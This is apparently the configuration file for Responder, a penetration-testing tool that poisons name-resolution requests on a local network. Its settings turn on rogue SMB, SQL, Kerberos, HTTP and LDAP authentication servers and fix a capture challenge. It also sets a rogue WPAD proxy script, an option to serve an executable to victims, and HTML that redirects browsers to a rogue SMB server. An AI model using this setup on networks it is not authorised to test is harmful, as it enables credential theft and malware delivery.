[Responder Core] ;; ;Set these values to On or Off, so you can control which rogue authentication server is turned on. SQL = On SMB = On Kerberos = On FTP = On POP = On ;;Listen on 25/TCP, 587/TCP SMTP = On IMAP = On HTTP = On HTTPS = On DNS = On LDAP = On ; ;Set a custom challenge Challenge = 1122334455667788 ; ;Set this to change the default logging file SessionLog = Responder-Session.log ; ;Set this option with your in-scope targets (default = All). Example: RespondTo =,,, ;RespondTo =,,, RespondTo = ;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT ;RespondTo = WPAD,DEV,PROD,SQLINT RespondToName = ; ;DontRespondTo =,,, DontRespondTo = ;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS DontRespondToName = ; [HTTP Server] ;; ;Set this to On if you want to always serve a specific file to the victim. Serve-Always = Off ; ;Set this to On if you want to serve an executable file each time a .exe is detected in an URL. Serve-Exe = Off ; ;Uncomment and specify a custom file to serve, the file must exist. Filename = Denied.html ; ;Specify a custom executable file to serve, the file must exist. ExecFilename = FixInternet.exe ; ;Set your custom PAC script WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';} ; ;HTML answer to inject. ;In this example, we redirect the browser to our rogue SMB server. Please consider the "RespProxySrv" string when modifying, it is used in conjunction with WPADScript so no proxy will be used for this host.Also, the HTML has to be in this format " Payload goes here...". HTMLToServe = Loading [HTTPS Server] ; ;Change to use your certs cert = Certs/responder.crt key = Certs/responder.key ;